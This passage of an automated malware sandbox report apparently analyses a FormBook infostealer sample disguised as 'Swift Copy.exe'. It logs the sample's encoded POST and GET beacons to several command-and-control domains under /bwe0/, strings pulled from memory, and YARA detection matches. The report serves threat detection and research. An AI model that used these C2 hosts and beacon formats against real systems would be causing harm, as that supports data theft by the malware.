9rV8zl=B5VSj7q9OrrXt0QyO3~t5HG4gQ1IYGjAkr4grclsQTZygJmyCZVzOae5m8r-pOgbrUs5sxcEqjzcbIjYbuImo86TsJsNisYMMjKq5fc1wImiYFA1d2luYCsbKIW12-MQFCozdymJi7n0eXy_7_8j(luf5Y1mfNqlVaxE75cj3Zfao3nOC0Pk1WTC(3OUBdieZJUvKjeD6AiSnCYo(Fpd92PzjzQTCdCVc28tQXgV7R4Bq-K7dJZv9Hk19je5Qu4P~XdT3VyGH3LZWElvEewgD3gl5B(sZ41Gq4~90Yl3Z7WQ4OUgkgMWgEO7MHrm4rMt38WxS1WVIZZ28mtzgEOM5bZb(ndazYZJVxL9ZjYMMAHXGKK50m7XTtaWctzJ5RBWqltzmYbbrCmtebJUkA).
          Source: global trafficHTTP traffic detected: POST /bwe0/ HTTP/1.1Host: www.epic45.co.ukConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.epic45.co.ukUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.epic45.co.uk/bwe0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 39 72 56 38 7a 6c 3d 37 33 46 44 59 52 4b 62 51 55 65 6b 6e 4e 72 35 6d 35 77 70 70 4a 66 6a 4c 6a 65 54 6b 43 74 32 64 71 71 4c 43 68 42 78 62 34 65 36 59 73 33 4f 32 5f 28 78 59 74 54 62 4d 4b 4f 35 7a 42 4d 4b 54 49 63 4d 35 6f 54 4e 39 58 42 31 36 72 58 36 57 7a 41 37 72 66 6b 73 4e 4a 70 74 34 59 78 54 55 6e 39 59 71 34 39 46 4f 42 49 48 46 48 59 74 57 47 62 38 69 5a 4b 46 7e 4e 63 39 41 36 42 6c 39 68 4e 43 76 6d 73 57 75 75 77 50 4e 5a 7e 32 7e 33 39 74 69 42 75 4f 56 36 45 7a 79 69 54 57 59 48 42 4f 42 49 74 6d 6a 5a 4e 68 31 42 47 50 35 49 69 78 6f 65 76 65 63 52 45 53 6e 66 50 43 78 50 5a 4a 72 75 77 78 30 72 6d 68 74 6a 34 75 5a 41 50 46 71 5f 59 6a 61 4b 4b 36 53 71 7e 68 55 46 6e 44 67 37 54 38 41 36 52 2d 77 33 4c 54 57 41 30 52 4b 5a 77 30 31 69 33 4d 72 45 32 35 38 63 46 6d 74 4d 39 5a 35 54 7a 31 41 69 38 4e 45 32 6d 67 36 64 37 65 41 59 46 5f 30 6f 77 64 77 6c 45 51 56 44 51 65 51 4a 78 50 59 2d 61 4e 72 52 36 57 67 62 30 4f 4b 34 37 63 41 72 34 5a 4b 6b 6c 75 6f 63 36 75 36 46 4d 61 62 5a 42 32 74 63 70 49 6f 7a 73 63 75 72 32 43 75 34 46 44 73 77 77 5f 4c 69 48 41 32 66 6e 2d 59 53 7e 64 58 37 32 42 74 37 4d 61 57 67 31 57 67 6d 42 78 77 38 63 31 28 76 66 70 38 4e 69 7a 79 50 53 4a 67 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 9rV8zl=73FDYRKbQUeknNr5m5wppJfjLjeTkCt2dqqLChBxb4e6Ys3O2_(xYtTbMKO5zBMKTIcM5oTN9XB16rX6WzA7rfksNJpt4YxTUn9Yq49FOBIHFHYtWGb8iZKF~Nc9A6Bl9hNCvmsWuuwPNZ~2~39tiBuOV6EzyiTWYHBOBItmjZNh1BGP5IixoevecRESnfPCxPZJruwx0rmhtj4uZAPFq_YjaKK6Sq~hUFnDg7T8A6R-w3LTWA0RKZw01i3MrE258cFmtM9Z5Tz1Ai8NE2mg6d7eAYF_0owdwlEQVDQeQJxPY-aNrR6Wgb0OK47cAr4ZKkluoc6u6FMabZB2tcpIozscur2Cu4FDsww_LiHA2fn-YS~dX72Bt7MaWg1WgmBxw8c1(vfp8NizyPSJgQ).
          Source: global trafficHTTP traffic detected: POST /bwe0/ HTTP/1.1Host: www.mogdento.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.mogdento.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.mogdento.com/bwe0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 39 72 56 38 7a 6c 3d 54 48 56 65 71 57 49 4c 62 30 44 33 79 56 36 4d 38 64 75 30 4f 69 77 5f 64 46 49 30 49 61 53 46 4c 6e 77 7a 28 37 6f 72 6e 33 48 6a 64 75 7a 78 79 7a 47 48 61 41 50 6b 37 77 57 49 47 67 71 37 5a 63 6e 77 56 53 39 2d 71 76 63 72 4f 30 6a 70 67 63 61 54 79 38 56 78 56 37 54 46 72 54 4a 33 35 46 48 49 45 79 68 6f 76 33 65 70 64 76 42 4d 66 39 34 41 79 6a 47 2d 49 52 6f 34 6f 64 59 4f 4b 6f 37 58 74 64 5a 36 6f 74 47 71 30 7a 48 6f 49 74 62 39 6d 78 78 74 4d 51 56 2d 7e 64 75 43 63 78 63 2d 38 36 7a 31 38 4f 53 77 31 4a 6b 6a 4e 32 4b 6b 76 4b 43 76 50 39 34 41 56 79 6a 78 56 38 67 6a 6a 32 30 45 4b 39 41 38 45 50 48 43 71 76 49 4c 62 4d 28 74 62 71 46 6b 42 33 7e 4f 30 49 6b 36 69 73 46 52 62 75 75 78 7e 51 28 62 50 6d 5a 78 78 6c 43 43 70 70 69 5f 7e 4f 4c 77 49 68 4d 67 30 33 28 6e 59 78 32 64 56 31 35 4e 37 66 46 48 77 67 65 4a 68 59 4a 53 28 2d 7e 54 76 35 4f 33 47 4c 46 30 75 51 30 4b 69 49 34 74 48 41 44 55 6f 67 66 33 38 68 6b 41 4c 5f 4d 70 6c 4d 38 53 46 6a 39 45 4a 48 66 4b 6e 38 54 6d 66 31 77 43 63 5f 42 32 5a 71 59 31 59 4a 52 73 33 76 57 58 73 58 5a 41 68 73 4c 62 4c 59 59 33 56 5f 64 36 31 71 56 34 41 66 7e 79 65 6d 57 78 50 69 4d 6e 50 61 43 39 46 61 57 69 57 6c 4b 55 65 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 9rV8zl=THVeqWILb0D3yV6M8du0Oiw_dFI0IaSFLnwz(7orn3HjduzxyzGHaAPk7wWIGgq7ZcnwVS9-qvcrO0jpgcaTy8VxV7TFrTJ35FHIEyhov3epdvBMf94AyjG-IRo4odYOKo7XtdZ6otGq0zHoItb9mxxtMQV-~duCcxc-86z18OSw1JkjN2KkvKCvP94AVyjxV8gjj20EK9A8EPHCqvILbM(tbqFkB3~O0Ik6isFRbuux~Q(bPmZxxlCCppi_~OLwIhMg03(nYx2dV15N7fFHwgeJhYJS(-~Tv5O3GLF0uQ0KiI4tHADUogf38hkAL_MplM8SFj9EJHfKn8Tmf1wCc_B2ZqY1YJRs3vWXsXZAhsLbLYY3V_d61qV4Af~yemWxPiMnPaC9FaWiWlKUew).
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Thu, 11 Aug 2022 04:29:41 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 9X-Rate-Limit-Reset: 2022-08-11T04:29:46.0784500Z
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 11 Aug 2022 04:30:01 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 393Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 65 70 69 63 34 35 2e 63 6f 2e 75 6b 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at epic45.co.uk Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 11 Aug 2022 04:30:03 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 393Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 65 70 69 63 34 35 2e 63 6f 2e 75 6b 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at epic45.co.uk Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:30:09 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mogdento.com/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 33 65 33 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6e 6f 2d 73 76 67 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 39 2e 34 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 4d 4f 47 44 45 4e 54 4f 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 4d 4f 47 44 45 4e 54 4f 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 4f 47 44 45 4e 54 4f 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 4f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 6f 67 64 65 6e 74 6f 2e 63 6f 6d 2f 23 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 2c 22 6e 61 6d 65 22 3a 22 4d 4f 47 44 45 4e 54 4f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 6f 67 64 65 6e 74 6f 2e 63 6f 6d 2f 22 2c 22 73 61 6d 65 41 73 22 3a 5b 5d 2c 22 6c 6f 67 6f 22 3a 7b 22 40 74 79 70 65 22 3a 22 49 6d 61 67 65 4f 62 6a 65 63 74 22 2c 22 69 6e 4c 61 6e 67 75 61 67 65 22 3a 22 65 6e 2d 55 53 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 6f 67 64 65 6e 74 6f 2e 63 6f 6d 2f 23 2f 73 63 68 65 6d 61 2f 6c 6f 67 6f 2f 69 6d 61 67 65 2f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 6f 67 64 6
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
          Source: NETSTAT.EXE, 00000019.00000002.518477134.0000000003996000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://mogdento.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=eF9
          Source: Swift Copy.exe, ImUIYlbLTIh.exe.0.drString found in binary or memory: http://philiphanson.org/medius/book/1.0
          Source: explorer.exe, 0000000B.00000000.339382801.00000000061ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.323818744.00000000061ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.389826737.00000000061ED000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.micr$
          Source: Swift Copy.exe, 00000000.00000002.286746529.0000000002670000.00000004.00000800.00020000.00000000.sdmp, Swift Copy.exe, 00000000.00000002.284828644.0000000002420000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: NETSTAT.EXE, 00000019.00000002.518373021.00000000036A2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.expectedclosure.one/bwe0/?9rV8zl=z0a7bU3Grk9SZV
          Source: NETSTAT.EXE, 00000019.00000002.518409409.000000000379E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.kinemartigues.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=M79ygOKZB
          Source: NETSTAT.EXE, 00000019.00000002.518409409.000000000379E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.kinemartigues.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&amp;9rV8zl=M79ygOKZB
          Source: unknownHTTP traffic detected: POST /bwe0/ HTTP/1.1Host: www.expectedclosure.oneConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.expectedclosure.oneUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.expectedclosure.one/bwe0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 39 72 56 38 7a 6c 3d 7e 32 79 62 59 68 7a 7a 38 51 68 46 58 58 28 4a 67 53 55 6c 6f 2d 48 71 71 46 7a 32 35 55 73 73 50 4a 64 6e 6e 78 4e 52 75 45 56 76 44 41 36 6b 34 49 41 4c 69 64 64 7a 56 52 38 2d 71 61 6e 6a 7a 56 6a 6b 45 76 48 4f 4f 33 6e 49 77 43 79 55 49 42 75 61 44 77 50 31 32 7a 6e 6b 36 69 36 48 34 61 32 52 46 74 70 30 57 46 4f 6a 66 66 79 38 4e 53 70 53 77 79 64 5a 78 55 45 34 31 57 42 39 66 32 47 33 42 79 62 33 7a 6d 34 42 33 63 52 46 44 43 6b 48 6c 38 4d 34 6e 4e 4b 53 39 78 66 6a 30 62 37 4b 4c 50 55 75 75 4a 30 57 41 4e 30 61 6c 6d 38 57 52 63 34 63 77 46 6d 5f 4e 4b 44 32 71 70 59 38 49 37 78 39 28 46 57 30 36 66 63 68 74 42 71 6c 7e 33 49 38 75 6c 52 41 63 31 36 4d 45 6c 76 75 66 4a 68 31 5a 49 62 55 6a 33 6c 36 41 2d 33 6f 33 6c 4b 43 78 41 41 58 33 57 32 33 34 74 48 6a 42 4f 28 5a 7a 38 5a 76 78 4d 51 6f 37 6a 64 59 58 2d 46 6b 54 6e 39 62 69 6f 4b 74 55 68 78 4e 45 55 31 73 66 79 33 5f 52 4d 68 4a 64 51 74 49 59 67 76 52 6c 37 54 37 67 62 69 6e 54 74 7e 38 54 2d 57 62 51 36 74 77 42 48 77 66 71 45 53 50 7a 39 70 31 4a 58 46 4e 34 37 67 33 67 68 7e 4f 47 49 4a 4b 56 42 52 67 30 6b 68 59 33 50 79 37 7e 46 6d 76 66 7a 7a 58 30 57 6b 69 46 68 6e 6c 32 53 45 67 57 71 46 39 6e 46 70 70 39 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 9rV8zl=~2ybYhzz8QhFXX(JgSUlo-HqqFz25UssPJdnnxNRuEVvDA6k4IALiddzVR8-qanjzVjkEvHOO3nIwCyUIBuaDwP12znk6i6H4a2RFtp0WFOjffy8NSpSwydZxUE41WB9f2G3Byb3zm4B3cRFDCkHl8M4nNKS9xfj0b7KLPUuuJ0WAN0alm8WRc4cwFm_NKD2qpY8I7x9(FW06fchtBql~3I8ulRAc16MElvufJh1ZIbUj3l6A-3o3lKCxAAX3W234tHjBO(Zz8ZvxMQo7jdYX-FkTn9bioKtUhxNEU1sfy3_RMhJdQtIYgvRl7T7gbinTt~8T-WbQ6twBHwfqESPz9p1JXFN47g3gh~OGIJKVBRg0khY3Py7~FmvfzzX0WkiFhnl2SEgWqF9nFpp9g).
          Source: unknownDNS traffic detected: queries for: www.blackyaga.xyz
          Source: global trafficHTTP traffic detected: GET /bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=sE+e17jc53oiMc/tXTBrdM81Jmo39pRVgGsWsNeg2yHBZP8DMvAafxUSa5mU59eBVMhEqwjNcWZP/MmjQeTg8VWUgAq2ah5qoA== HTTP/1.1Host: www.blackyaga.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bwe0/?9rV8zl=z0a7bU3Grk9SZV+rn0o4us/noU2vzWsLY51yg1R10n5VTVON6q0J/IdVbRNrmdil3H/zWNK1GQbVnCycFh7AKivH+ief+xiP+g==&YN9=w6PTp6pp-Zfte2a0 HTTP/1.1Host: www.expectedclosure.oneConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=M79ygOKZB+LrmWtJBQqMyCe4o1I9YkrzlNkt4Y5lQSVrtsHmDN4rDqK6jdbIqfImlF05yj9AnCTnfqfBJ/tqveG/rYA7nf00SA== HTTP/1.1Host: www.kinemartigues.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bwe0/?9rV8zl=21tjbkChbFWznsu0s5dQgMCLDQHTp3tJL/2kMDFZYsfdSZfl+tTwQu/FIpmHzzlEQrwumqO36HFfwo3EfD1Crt0mHKlMwrNEfw==&YN9=w6PTp6pp-Zfte2a0 HTTP/1.1Host: www.epic45.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=eF9+phILUgzUwHPh2LCdIS8sbnczPqTtIgth+oM8i1bVTrz46wPYQwCayAKWOCT9dODOCAwfo9QBDVHWgp/MlMRCDLLRs2he6w== HTTP/1.1Host: www.mogdento.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
